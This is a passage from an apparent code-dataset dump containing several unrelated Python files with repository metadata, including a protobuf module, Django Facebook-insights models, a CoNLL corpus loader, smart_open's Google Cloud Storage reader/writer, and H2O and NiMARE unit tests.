] | 9 | 2018-01-03T13:52:52.000Z | 2022-02-28T09:03:01.000Z | example_pb2.py | Muroger/SVHNClassifier_pytorch | 608e2fc4d7eee0966949533195ad91abca6cf323 | [
"MIT"
] | 47 | 2017-04-05T09:02:14.000Z | 2021-12-27T05:41:23.000Z | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: example.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='example.proto',
package='',
syntax='proto3',
serialized_pb=_b('\n\rexample.proto\"8\n\x07\x45xample\x12\r\n\x05image\x18\x01 \x01(\x0c\x12\x0e\n\x06length\x18\x02 \x01(\x05\x12\x0e\n\x06\x64igits\x18\x03 \x03(\x05\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_EXAMPLE = _descriptor.Descriptor(
name='Example',
full_name='Example',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='image', full_name='Example.image', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='length', full_name='Example.length', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='digits', full_name='Example.digits', index=2,
number=3, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=17,
serialized_end=73,
)
DESCRIPTOR.message_types_by_name['Example'] = _EXAMPLE
Example = _reflection.GeneratedProtocolMessageType('Example', (_message.Message,), dict(
DESCRIPTOR = _EXAMPLE,
__module__ = 'example_pb2'
# @@protoc_insertion_point(class_scope:Example)
))
_sym_db.RegisterMessage(Example)
# @@protoc_insertion_point(module_scope)
| 29.559524 | 186 | 0.733387 |
ee0321d7c553533fec77b298ed8e14c07dc54497 | 537 | py | Python | ggplot/geoms/geom_now_its_art.py | ouseful-backup/ggplot | b5872f04f4e6ee47874eb66676b1d44375d005ef | [
"BSD-2-Clause"
] | 6 | 2016-10-06T08:37:45.000Z | 2019-12-09T06:52:28.000Z | ggplot/geoms/geom_now_its_art.py | vannem/ggplot | 0f3774e6a645796b843d3ce77fb388958773338e | [
"BSD-2-Clause"
] | null | null | null | ggplot/geoms/geom_now_its_art.py | vannem/ggplot | 0f3774e6a645796b843d3ce77fb388958773338e | [
"BSD-2-Clause"
] | 15 | 2015-12-15T05:49:39.000Z | 2021-04-17T09:47:48.000Z | from __future__ import (absolute_import, division, print_function,
unicode_literals)
import matplotlib.image as mpimg
from .geom import geom
import os
_ROOT = os.path.abspath(os.path.dirname(__file__))
class geom_now_its_art(geom):
DEFAULT_AES = {'alpha': 0.5}
DEFAULT_PARAMS = {'stat': 'identity', 'position': 'identity'}
def _plot_unit(self, pinfo, ax):
img = mpimg.imread(os.path.join(_ROOT, 'bird.png'))
ax.imshow(img, alpha=pinfo['alpha'])
print ("Put a bird on it!")
| 29.833333 | 66 | 0.659218 |
6f381d2c11db7d73a4cd543e2bb3bd42e253157d | 2,695 | py | Python | h2o-py/tests/testdir_apis/H2O_Module/pyunit_h2ocreate_frame.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 6,098 | 2015-05-22T02:46:12.000Z | 2022-03-31T16:54:51.000Z | h2o-py/tests/testdir_apis/H2O_Module/pyunit_h2ocreate_frame.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 2,517 | 2015-05-23T02:10:54.000Z | 2022-03-30T17:03:39.000Z | h2o-py/tests/testdir_apis/H2O_Module/pyunit_h2ocreate_frame.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 2,199 | 2015-05-22T04:09:55.000Z | 2022-03-28T22:20:45.000Z | from __future__ import print_function
import sys
sys.path.insert(1,"../../../")
from tests import pyunit_utils
import h2o
import random
from h2o.utils.typechecks import assert_is_type
from h2o.frame import H2OFrame
def h2ocreate_frame():
"""
Python API test: h2o.create_frame(frame_id=None, rows=10000, cols=10, randomize=True, real_fraction=None,
categorical_fraction=None, integer_fraction=None, binary_fraction=None, time_fraction=None,
string_fraction=None, value=0, real_range=100, factors=100, integer_range=100,
binary_ones_fraction=0.02, missing_fraction=0.01, has_response=False, response_factors=2,
positive_response=False, seed=None, seed_for_column_types=None)
Copied from pyunit_NOPASS_javapredict_dynamic_data_paramsDL.py
"""
# Generate random dataset
dataset_params = {}
dataset_params['rows'] = random.sample(list(range(50,150)),1)[0]
dataset_params['cols'] = random.sample(list(range(3,6)),1)[0]
dataset_params['categorical_fraction'] = round(random.random(),1)
left_over = (1 - dataset_params['categorical_fraction'])
dataset_params['integer_fraction'] = round(left_over - round(random.uniform(0,left_over),1),1)
if dataset_params['integer_fraction'] + dataset_params['categorical_fraction'] == 1:
if dataset_params['integer_fraction'] > dataset_params['categorical_fraction']:
dataset_params['integer_fraction'] = dataset_params['integer_fraction'] - 0.1
else:
dataset_params['categorical_fraction'] = dataset_params['categorical_fraction'] - 0.1
dataset_params['missing_fraction'] = random.uniform(0,0.5)
dataset_params['has_response'] = False
dataset_params['randomize'] = True
dataset_params['factors'] = random.randint(2,5)
print("Dataset parameters: {0}".format(dataset_params))
distribution = random.sample(['bernoulli','multinomial','gaussian','poisson','gamma'], 1)[0]
if distribution == 'bernoulli': dataset_params['response_factors'] = 2
elif distribution == 'gaussian': dataset_params['response_factors'] = 1
elif distribution == 'multinomial': dataset_params['response_factors'] = random.randint(3,5)
else:
dataset_params['has_response'] = False
print("Distribution: {0}".format(distribution))
train = h2o.create_frame(**dataset_params)
assert_is_type(train, H2OFrame)
assert train.ncol==dataset_params['cols'], "h2o.create_frame() create frame with wrong column number."
assert train.nrow==dataset_params['rows'], "h2o.create_frame() create frame with wrong row number."
if __name__ == "__main__":
pyunit_utils.standalone_test(h2ocreate_frame)
else:
h2ocreate_frame()
| 49 | 109 | 0.731354 |
a2ae89a9afb5631e2fcf07727c1dd93c80719f73 | 3,162 | py | Python | estatisticas_facebook/pages/models.py | danieldourado/estatisticas_facebook_django | 67274e647cf9e2261f1a7810cd9862a4040dfc06 | [
"MIT"
] | 2 | 2017-12-22T01:00:22.000Z | 2017-12-22T11:14:40.000Z | estatisticas_facebook/pages/models.py | danieldourado/estatisticas_facebook_django | 67274e647cf9e2261f1a7810cd9862a4040dfc06 | [
"MIT"
] | 18 | 2017-12-14T12:04:45.000Z | 2022-03-11T23:23:05.000Z | estatisticas_facebook/pages/models.py | danieldourado/estatisticas_facebook_django | 67274e647cf9e2261f1a7810cd9862a4040dfc06 | [
"MIT"
] | 1 | 2021-03-27T16:18:56.000Z | 2021-03-27T16:18:56.000Z | from django.db import models
from django.db.models.signals import pre_save, post_save
from .utils import unique_slug_generator
from django.utils.dateformat import DateFormat, TimeFormat
from estatisticas_facebook.util.graph import *
def getPageInfo(page):
raw_json = getNewGraphApi(page.name).get_object(page.name)
print (raw_json)
page.pretty_name = raw_json['name']
page.id = raw_json['id']
def getPageInsights(args):
PageInsights.objects.all().delete()
since = args['since']
raw_json = get_graph_object(args['id'],args['id']+'/insights?period=day&metric=page_fan_adds_unique,page_impressions_unique,page_engaged_users,page_stories,page_storytellers&since='+str(since))
pagedata = raw_json['data']
for obj in pagedata:
print (obj['name'])
for value in obj['values']:
page_insights = PageInsights(
name=obj['name'],
period=obj['period'],
title=obj['title'],
description=obj['description'],
end_time=value['end_time'],
value=value['value'],
page_id=args['id'])
page_insights.save()
# Create your models here.
class Page(models.Model):
id = models.CharField(primary_key = True, max_length = 45)
name = models.CharField(max_length = 18000, unique=True)
pretty_name = models.CharField(max_length = 18000,null=True, blank=True)
access_token = models.CharField(max_length = 18000,null=True, blank=True)
created = models.DateTimeField(auto_now_add=True)
slug = models.SlugField(null=True, blank=True)
post_paging = models.CharField(max_length = 512, null=True)
post_since = models.DateTimeField(null=True)
def __str__(self):
return self.name
@property
def title(self):
return self.name
class PageInsights(models.Model):
page = models.ForeignKey(Page)
value = models.IntegerField()
end_time = models.DateTimeField()
period = models.CharField(max_length = 50)
title = models.CharField(max_length = 4500)
description = models.CharField(max_length = 4500)
name = models.CharField(max_length = 4500)
created = models.DateTimeField(auto_now_add=True)
slug = models.SlugField(null=True, blank=True)
def __str__(self):
return str(DateFormat(self.end_time).format('Y-m-d')) +': '+ self.title+' '+str(self.value)
def page_pre_save_reciever(sender, instance, *args, **kwargs):
if not instance.pretty_name:
getPageInfo(instance)
def slug_pre_save_reciever(sender, instance, *args, **kwargs):
if not instance.slug:
instance.slug = unique_slug_generator(instance)
#def rl_post_save_reciever(sender, instance, *args, **kwargs):
pre_save.connect(slug_pre_save_reciever, sender=PageInsights)
pre_save.connect(slug_pre_save_reciever, sender=Page)
pre_save.connect(page_pre_save_reciever, sender=Page)
#post_save.connect(rl_pre_save_reciever, sender=PageInsights)
| 37.642857 | 197 | 0.65876 |
1e62b042c77197697834e7229d9a8257630a1955 | 2,649 | py | Python | parser/utils/corpus.py | Muhamob/biaffine-parser | ffcbc4e48750da45b913b13597cca4429f4e6f93 | [
"MIT"
] | 1 | 2021-06-16T15:41:38.000Z | 2021-06-16T15:41:38.000Z | parser/utils/corpus.py | Muhamob/biaffine-parser | ffcbc4e48750da45b913b13597cca4429f4e6f93 | [
"MIT"
] | null | null | null | parser/utils/corpus.py | Muhamob/biaffine-parser | ffcbc4e48750da45b913b13597cca4429f4e6f93 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from collections import namedtuple
from collections.abc import Iterable
from parser.utils.field import Field
CoNLL = namedtuple(typename='CoNLL',
field_names=['ID', 'FORM', 'LEMMA', 'CPOS', 'POS',
'FEATS', 'HEAD', 'DEPREL', 'PHEAD', 'PDEPREL'],)
CoNLL.__new__.__defaults__ = tuple([None]*10)
class Sentence(object):
def __init__(self, fields, values):
for field, value in zip(fields, values):
if isinstance(field, Iterable):
for j in range(len(field)):
setattr(self, field[j].name, value)
else:
setattr(self, field.name, value)
self.fields = fields
@property
def values(self):
for field in self.fields:
if isinstance(field, Iterable):
yield getattr(self, field[0].name)
else:
yield getattr(self, field.name)
def __len__(self):
return len(next(iter(self.values)))
def __repr__(self):
return '\n'.join('\t'.join(map(str, line))
for line in zip(*self.values)) + '\n'
class Corpus(object):
def __init__(self, fields, sentences):
super(Corpus, self).__init__()
self.fields = fields
self.sentences = sentences
def __len__(self):
return len(self.sentences)
def __repr__(self):
return '\n'.join(str(sentence) for sentence in self)
def __getitem__(self, index):
return self.sentences[index]
def __getattr__(self, name):
if not hasattr(self.sentences[0], name):
raise AttributeError
for sentence in self.sentences:
yield getattr(sentence, name)
def __setattr__(self, name, value):
if name in ['fields', 'sentences']:
self.__dict__[name] = value
else:
for i, sentence in enumerate(self.sentences):
setattr(sentence, name, value[i])
@classmethod
def load(cls, path, fields):
start, sentences = 0, []
fields = [field if field is not None else Field(str(i))
for i, field in enumerate(fields)]
with open(path, 'r') as f:
lines = [line.strip() for line in f]
for i, line in enumerate(lines):
if not line:
values = list(zip(*[l.split('\t') for l in lines[start:i]]))
sentences.append(Sentence(fields, values))
start = i + 1
return cls(fields, sentences)
def save(self, path):
with open(path, 'w') as f:
f.write(f"{self}\n")
| 30.102273 | 80 | 0.556059 |
637c8376ebe20de84e466f3fef14b4f5e117be5d | 1,984 | py | Python | network.py | machinbrol/evolution-tray | d4fdbed8b9aa325eb068433455582f8f53d073b9 | [
"WTFPL"
] | null | null | null | network.py | machinbrol/evolution-tray | d4fdbed8b9aa325eb068433455582f8f53d073b9 | [
"WTFPL"
] | null | null | null | network.py | machinbrol/evolution-tray | d4fdbed8b9aa325eb068433455582f8f53d073b9 | [
"WTFPL"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# C'est pas pubsub mais plutôt observer pattern
# dans pubsub il y aurait un troisième élément intermédiaire, un "message broker"
from pyroute2 import IPRoute
from pyroute2.netlink.exceptions import NetlinkError
class Network:
def __init__(self):
self._is_network_down = False
self._ip_has_changed = False
self._state_has_changed = False
_, self._previous_ip = self._check()
self._subscribers_list = list()
def subscribe(self, obj):
if not hasattr(obj, "get_state"):
raise Exception("L'objet doit avoir une méthode 'get_state' qui prend deux booléens en paramètre")
self._subscribers_list.append(obj)
def _publish(self):
for obj in self._subscribers_list:
obj.get_state(self._state_has_changed, self._is_network_down)
def _check(self):
_is_network_down = False
_actual_ip = ""
with IPRoute() as ip:
try:
route = ip.route('get', dst='8.8.8.8')[0]
except NetlinkError:
_is_network_down = True
if not _is_network_down:
_actual_ip = route.get_attr("RTA_PREFSRC")
return _is_network_down, _actual_ip
# Check si le réseau est up et si l'ip a changé depuis le check précédent
def check(self):
_ip_has_changed = False
_is_network_down, _actual_ip = self._check()
if not _is_network_down:
_ip_has_changed = self._previous_ip != _actual_ip
if (self._is_network_down, self._ip_has_changed) != (_is_network_down, _ip_has_changed):
self._state_has_changed = True
else:
self._state_has_changed = False
self._is_network_down, self._ip_has_changed = _is_network_down, _ip_has_changed
self._previous_ip = _actual_ip
self._publish()
| 28.342857 | 110 | 0.624496 |
1baa4b4ef2b315825b25bb1e03c49993b73438b6 | 19,654 | py | Python | smart_open/gcs.py | sivchand/smart_open | 35d80d3bec5324c19427ce49fa8284f5b1c2c112 | [
"MIT"
] | 2,047 | 2016-06-16T15:35:45.000Z | 2022-03-31T04:32:57.000Z | smart_open/gcs.py | sivchand/smart_open | 35d80d3bec5324c19427ce49fa8284f5b1c2c112 | [
"MIT"
] | 524 | 2016-06-16T09:48:14.000Z | 2022-03-30T13:21:25.000Z | smart_open/gcs.py | sivchand/smart_open | 35d80d3bec5324c19427ce49fa8284f5b1c2c112 | [
"MIT"
] | 308 | 2016-06-16T09:02:51.000Z | 2022-03-24T20:57:52.000Z | # -*- coding: utf-8 -*-
#
# Copyright (C) 2019 Radim Rehurek <me@radimrehurek.com>
#
# This code is distributed under the terms and conditions
# from the MIT License (MIT).
#
"""Implements file-like objects for reading and writing to/from GCS."""
import io
import logging
try:
import google.cloud.exceptions
import google.cloud.storage
import google.auth.transport.requests
except ImportError:
MISSING_DEPS = True
import smart_open.bytebuffer
import smart_open.utils
from smart_open import constants
logger = logging.getLogger(__name__)
_BINARY_TYPES = (bytes, bytearray, memoryview)
"""Allowed binary buffer types for writing to the underlying GCS stream"""
_UNKNOWN = '*'
SCHEME = "gs"
"""Supported scheme for GCS"""
_MIN_MIN_PART_SIZE = _REQUIRED_CHUNK_MULTIPLE = 256 * 1024
"""Google requires you to upload in multiples of 256 KB, except for the last part."""
_DEFAULT_MIN_PART_SIZE = 50 * 1024**2
"""Default minimum part size for GCS multipart uploads"""
DEFAULT_BUFFER_SIZE = 256 * 1024
"""Default buffer size for working with GCS"""
_UPLOAD_INCOMPLETE_STATUS_CODES = (308, )
_UPLOAD_COMPLETE_STATUS_CODES = (200, 201)
def _make_range_string(start, stop=None, end=None):
#
# GCS seems to violate RFC-2616 (see utils.make_range_string), so we
# need a separate implementation.
#
# https://cloud.google.com/storage/docs/xml-api/resumable-upload#step_3upload_the_file_blocks
#
if end is None:
end = _UNKNOWN
if stop is None:
return 'bytes %d-/%s' % (start, end)
return 'bytes %d-%d/%s' % (start, stop, end)
class UploadFailedError(Exception):
def __init__(self, message, status_code, text):
"""Raise when a multi-part upload to GCS returns a failed response status code.
Parameters
----------
message: str
The error message to display.
status_code: int
The status code returned from the upload response.
text: str
The text returned from the upload response.
"""
super(UploadFailedError, self).__init__(message)
self.status_code = status_code
self.text = text
def _fail(response, part_num, content_length, total_size, headers):
status_code = response.status_code
response_text = response.text
total_size_gb = total_size / 1024.0 ** 3
msg = (
"upload failed (status code: %(status_code)d, response text: %(response_text)s), "
"part #%(part_num)d, %(total_size)d bytes (total %(total_size_gb).3fGB), headers: %(headers)r"
) % locals()
raise UploadFailedError(msg, response.status_code, response.text)
def parse_uri(uri_as_string):
sr = smart_open.utils.safe_urlsplit(uri_as_string)
assert sr.scheme == SCHEME
bucket_id = sr.netloc
blob_id = sr.path.lstrip('/')
return dict(scheme=SCHEME, bucket_id=bucket_id, blob_id=blob_id)
def open_uri(uri, mode, transport_params):
parsed_uri = parse_uri(uri)
kwargs = smart_open.utils.check_kwargs(open, transport_params)
return open(parsed_uri['bucket_id'], parsed_uri['blob_id'], mode, **kwargs)
def open(
bucket_id,
blob_id,
mode,
buffer_size=DEFAULT_BUFFER_SIZE,
min_part_size=_MIN_MIN_PART_SIZE,
client=None, # type: google.cloud.storage.Client
blob_properties=None
):
"""Open an GCS blob for reading or writing.
Parameters
----------
bucket_id: str
The name of the bucket this object resides in.
blob_id: str
The name of the blob within the bucket.
mode: str
The mode for opening the object. Must be either "rb" or "wb".
buffer_size: int, optional
The buffer size to use when performing I/O. For reading only.
min_part_size: int, optional
The minimum part size for multipart uploads. For writing only.
client: google.cloud.storage.Client, optional
The GCS client to use when working with google-cloud-storage.
blob_properties: dict, optional
Set properties on blob before writing. For writing only.
"""
if mode == constants.READ_BINARY:
fileobj = Reader(
bucket_id,
blob_id,
buffer_size=buffer_size,
line_terminator=constants.BINARY_NEWLINE,
client=client,
)
elif mode == constants.WRITE_BINARY:
fileobj = Writer(
bucket_id,
blob_id,
min_part_size=min_part_size,
client=client,
blob_properties=blob_properties,
)
else:
raise NotImplementedError('GCS support for mode %r not implemented' % mode)
fileobj.name = blob_id
return fileobj
class _RawReader(object):
"""Read an GCS object."""
def __init__(self, gcs_blob, size):
# type: (google.cloud.storage.Blob, int) -> None
self._blob = gcs_blob
self._size = size
self._position = 0
def seek(self, position):
"""Seek to the specified position (byte offset) in the GCS key.
:param int position: The byte offset from the beginning of the key.
Returns the position after seeking.
"""
self._position = position
return self._position
def read(self, size=-1):
if self._position >= self._size:
return b''
binary = self._download_blob_chunk(size)
self._position += len(binary)
return binary
def _download_blob_chunk(self, size):
start = position = self._position
if position == self._size:
#
# When reading, we can't seek to the first byte of an empty file.
# Similarly, we can't seek past the last byte. Do nothing here.
#
binary = b''
elif size == -1:
binary = self._blob.download_as_bytes(start=start)
else:
end = position + size
binary = self._blob.download_as_bytes(start=start, end=end)
return binary
class Reader(io.BufferedIOBase):
"""Reads bytes from GCS.
Implements the io.BufferedIOBase interface of the standard library.
:raises google.cloud.exceptions.NotFound: Raised when the blob to read from does not exist.
"""
def __init__(
self,
bucket,
key,
buffer_size=DEFAULT_BUFFER_SIZE,
line_terminator=constants.BINARY_NEWLINE,
client=None, # type: google.cloud.storage.Client
):
if client is None:
client = google.cloud.storage.Client()
self._blob = client.bucket(bucket).get_blob(key) # type: google.cloud.storage.Blob
if self._blob is None:
raise google.cloud.exceptions.NotFound('blob %s not found in %s' % (key, bucket))
self._size = self._blob.size if self._blob.size is not None else 0
self._raw_reader = _RawReader(self._blob, self._size)
self._current_pos = 0
self._current_part_size = buffer_size
self._current_part = smart_open.bytebuffer.ByteBuffer(buffer_size)
self._eof = False
self._line_terminator = line_terminator
#
# This member is part of the io.BufferedIOBase interface.
#
self.raw = None
#
# Override some methods from io.IOBase.
#
def close(self):
"""Flush and close this stream."""
logger.debug("close: called")
self._blob = None
self._current_part = None
self._raw_reader = None
def readable(self):
"""Return True if the stream can be read from."""
return True
def seekable(self):
"""If False, seek(), tell() and truncate() will raise IOError.
We offer only seek support, and no truncate support."""
return True
#
# io.BufferedIOBase methods.
#
def detach(self):
"""Unsupported."""
raise io.UnsupportedOperation
def seek(self, offset, whence=constants.WHENCE_START):
"""Seek to the specified position.
:param int offset: The offset in bytes.
:param int whence: Where the offset is from.
Returns the position after seeking."""
logger.debug('seeking to offset: %r whence: %r', offset, whence)
if whence not in constants.WHENCE_CHOICES:
raise ValueError('invalid whence, expected one of %r' % constants.WHENCE_CHOICES)
if whence == constants.WHENCE_START:
new_position = offset
elif whence == constants.WHENCE_CURRENT:
new_position = self._current_pos + offset
else:
new_position = self._size + offset
new_position = smart_open.utils.clamp(new_position, 0, self._size)
self._current_pos = new_position
self._raw_reader.seek(new_position)
logger.debug('current_pos: %r', self._current_pos)
self._current_part.empty()
self._eof = self._current_pos == self._size
return self._current_pos
def tell(self):
"""Return the current position within the file."""
return self._current_pos
def truncate(self, size=None):
"""Unsupported."""
raise io.UnsupportedOperation
def read(self, size=-1):
"""Read up to size bytes from the object and return them."""
if size == 0:
return b''
elif size < 0:
self._current_pos = self._size
return self._read_from_buffer() + self._raw_reader.read()
#
# Return unused data first
#
if len(self._current_part) >= size:
return self._read_from_buffer(size)
#
# If the stream is finished, return what we have.
#
if self._eof:
return self._read_from_buffer()
#
# Fill our buffer to the required size.
#
self._fill_buffer(size)
return self._read_from_buffer(size)
def read1(self, size=-1):
"""This is the same as read()."""
return self.read(size=size)
def readinto(self, b):
"""Read up to len(b) bytes into b, and return the number of bytes
read."""
data = self.read(len(b))
if not data:
return 0
b[:len(data)] = data
return len(data)
def readline(self, limit=-1):
"""Read up to and including the next newline. Returns the bytes read."""
if limit != -1:
raise NotImplementedError('limits other than -1 not implemented yet')
the_line = io.BytesIO()
while not (self._eof and len(self._current_part) == 0):
#
# In the worst case, we're reading the unread part of self._current_part
# twice here, once in the if condition and once when calling index.
#
# This is sub-optimal, but better than the alternative: wrapping
# .index in a try..except, because that is slower.
#
remaining_buffer = self._current_part.peek()
if self._line_terminator in remaining_buffer:
next_newline = remaining_buffer.index(self._line_terminator)
the_line.write(self._read_from_buffer(next_newline + 1))
break
else:
the_line.write(self._read_from_buffer())
self._fill_buffer()
return the_line.getvalue()
#
# Internal methods.
#
def _read_from_buffer(self, size=-1):
"""Remove at most size bytes from our buffer and return them."""
# logger.debug('reading %r bytes from %r byte-long buffer', size, len(self._current_part))
size = size if size >= 0 else len(self._current_part)
part = self._current_part.read(size)
self._current_pos += len(part)
# logger.debug('part: %r', part)
return part
def _fill_buffer(self, size=-1):
size = size if size >= 0 else self._current_part._chunk_size
while len(self._current_part) < size and not self._eof:
bytes_read = self._current_part.fill(self._raw_reader)
if bytes_read == 0:
logger.debug('reached EOF while filling buffer')
self._eof = True
def __str__(self):
return "(%s, %r, %r)" % (self.__class__.__name__, self._blob.bucket.name, self._blob.name)
def __repr__(self):
return "%s(bucket=%r, blob=%r, buffer_size=%r)" % (
self.__class__.__name__, self._blob.bucket.name, self._blob.name, self._current_part_size,
)
class Writer(io.BufferedIOBase):
"""Writes bytes to GCS.
Implements the io.BufferedIOBase interface of the standard library."""
def __init__(
self,
bucket,
blob,
min_part_size=_DEFAULT_MIN_PART_SIZE,
client=None, # type: google.cloud.storage.Client
blob_properties=None,
):
if client is None:
client = google.cloud.storage.Client()
self._client = client
self._blob = self._client.bucket(bucket).blob(blob) # type: google.cloud.storage.Blob
assert min_part_size % _REQUIRED_CHUNK_MULTIPLE == 0, 'min part size must be a multiple of 256KB'
assert min_part_size >= _MIN_MIN_PART_SIZE, 'min part size must be greater than 256KB'
self._min_part_size = min_part_size
self._total_size = 0
self._total_parts = 0
self._bytes_uploaded = 0
self._current_part = io.BytesIO()
self._session = google.auth.transport.requests.AuthorizedSession(client._credentials)
if blob_properties:
for k, v in blob_properties.items():
setattr(self._blob, k, v)
#
# https://cloud.google.com/storage/docs/json_api/v1/how-tos/resumable-upload#start-resumable
#
self._resumable_upload_url = self._blob.create_resumable_upload_session()
#
# This member is part of the io.BufferedIOBase interface.
#
self.raw = None
def flush(self):
pass
#
# Override some methods from io.IOBase.
#
def close(self):
logger.debug("closing")
if not self.closed:
if self._total_size == 0: # empty files
self._upload_empty_part()
else:
self._upload_part(is_last=True)
self._client = None
logger.debug("successfully closed")
@property
def closed(self):
return self._client is None
def writable(self):
"""Return True if the stream supports writing."""
return True
def seekable(self):
"""If False, seek(), tell() and truncate() will raise IOError.
We offer only tell support, and no seek or truncate support."""
return True
def seek(self, offset, whence=constants.WHENCE_START):
"""Unsupported."""
raise io.UnsupportedOperation
def truncate(self, size=None):
"""Unsupported."""
raise io.UnsupportedOperation
def tell(self):
"""Return the current stream position."""
return self._total_size
#
# io.BufferedIOBase methods.
#
def detach(self):
raise io.UnsupportedOperation("detach() not supported")
def write(self, b):
"""Write the given bytes (binary string) to the GCS file.
There's buffering happening under the covers, so this may not actually
do any HTTP transfer right away."""
if not isinstance(b, _BINARY_TYPES):
raise TypeError("input must be one of %r, got: %r" % (_BINARY_TYPES, type(b)))
self._current_part.write(b)
self._total_size += len(b)
#
# If the size of this part is precisely equal to the minimum part size,
# we don't perform the actual write now, and wait until we see more data.
# We do this because the very last part of the upload must be handled slightly
# differently (see comments in the _upload_part method).
#
if self._current_part.tell() > self._min_part_size:
self._upload_part()
return len(b)
def terminate(self):
"""Cancel the underlying resumable upload."""
#
# https://cloud.google.com/storage/docs/xml-api/resumable-upload#example_cancelling_an_upload
#
self._session.delete(self._resumable_upload_url)
#
# Internal methods.
#
def _upload_part(self, is_last=False):
part_num = self._total_parts + 1
#
# Here we upload the largest amount possible given GCS's restriction
# of parts being multiples of 256kB, except for the last one.
#
# A final upload of 0 bytes does not work, so we need to guard against
# this edge case. This results in occasionally keeping an additional
# 256kB in the buffer after uploading a part, but until this is fixed
# on Google's end there is no other option.
#
# https://stackoverflow.com/questions/60230631/upload-zero-size-final-part-to-google-cloud-storage-resumable-upload
#
content_length = self._current_part.tell()
remainder = content_length % self._min_part_size
if is_last:
end = self._bytes_uploaded + content_length
elif remainder == 0:
content_length -= _REQUIRED_CHUNK_MULTIPLE
end = None
else:
content_length -= remainder
end = None
range_stop = self._bytes_uploaded + content_length - 1
content_range = _make_range_string(self._bytes_uploaded, range_stop, end=end)
headers = {
'Content-Length': str(content_length),
'Content-Range': content_range,
}
logger.info(
"uploading part #%i, %i bytes (total %.3fGB) headers %r",
part_num, content_length, range_stop / 1024.0 ** 3, headers,
)
self._current_part.seek(0)
response = self._session.put(
self._resumable_upload_url,
data=self._current_part.read(content_length),
headers=headers,
)
if is_last:
expected = _UPLOAD_COMPLETE_STATUS_CODES
else:
expected = _UPLOAD_INCOMPLETE_STATUS_CODES
if response.status_code not in expected:
_fail(response, part_num, content_length, self._total_size, headers)
logger.debug("upload of part #%i finished" % part_num)
self._total_parts += 1
self._bytes_uploaded += content_length
#
# For the last part, the below _current_part handling is a NOOP.
#
self._current_part = io.BytesIO(self._current_part.read())
self._current_part.seek(0, io.SEEK_END)
def _upload_empty_part(self):
logger.debug("creating empty file")
headers = {'Content-Length': '0'}
response = self._session.put(self._resumable_upload_url, headers=headers)
if response.status_code not in _UPLOAD_COMPLETE_STATUS_CODES:
_fail(response, self._total_parts + 1, 0, self._total_size, headers)
self._total_parts += 1
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
self.terminate()
else:
self.close()
def __str__(self):
return "(%s, %r, %r)" % (self.__class__.__name__, self._blob.bucket.name, self._blob.name)
def __repr__(self):
return "%s(bucket=%r, blob=%r, min_part_size=%r)" % (
self.__class__.__name__, self._blob.bucket.name, self._blob.name, self._min_part_size,
)
| 32.811352 | 123 | 0.622062 |
8b3098d060c7789b83d5add883bc452e0dd98a99 | 1,224 | py | Python | nimare/tests/test_annotate_gclda.py | akimbler/NiMARE | 717697035b04ff0244aa4aa170f5aa16a9fba69a | [
"MIT"
] | null | null | null | nimare/tests/test_annotate_gclda.py | akimbler/NiMARE | 717697035b04ff0244aa4aa170f5aa16a9fba69a | [
"MIT"
] | null | null | null | nimare/tests/test_annotate_gclda.py | akimbler/NiMARE | 717697035b04ff0244aa4aa170f5aa16a9fba69a | [
"MIT"
] | null | null | null | """
Test nimare.annotate.gclda (GCLDA).
"""
import os.path as op
import numpy as np
import pandas as pd
import nibabel as nib
import nimare
from nimare import annotate, decode
from .utils import get_test_data_path
def test_gclda():
"""
A smoke test for GCLDA.
"""
# A small test dataset with abstracts
dset = nimare.dataset.Dataset.load(
op.join(get_test_data_path(), "neurosynth_laird_studies.pkl.gz")
)
counts_df = annotate.text.generate_counts(
dset.texts, text_column="abstract", tfidf=False, min_df=1, max_df=1.0
)
model = annotate.gclda.GCLDAModel(counts_df, dset.coordinates, mask=dset.masker.mask_img)
model.fit(n_iters=5, loglikely_freq=5)
arr = np.zeros(dset.masker.mask_img.shape, int)
arr[40:44, 45:49, 40:44] = 1
mask_img = nib.Nifti1Image(arr, dset.masker.mask_img.affine)
decoded_df, _ = decode.discrete.gclda_decode_roi(model, mask_img)
assert isinstance(decoded_df, pd.DataFrame)
decoded_df, _ = decode.continuous.gclda_decode_map(model, mask_img)
assert isinstance(decoded_df, pd.DataFrame)
encoded_img, _ = decode.encode.gclda_encode(model, "fmri activation")
assert isinstance(encoded_img, nib.Nifti1Image)
| 32.210526 | 93 | 0.723039 |
4bb3df2cb4d3c8113fcd128889a9ab53c05d58af | 44,954 | py | Python | core/dbt/parser/manifest.py | juma-adoreme/dbt | b37f6a010e549f1f0150846e9f74526099e55a3f | [
"Apache-2.0"
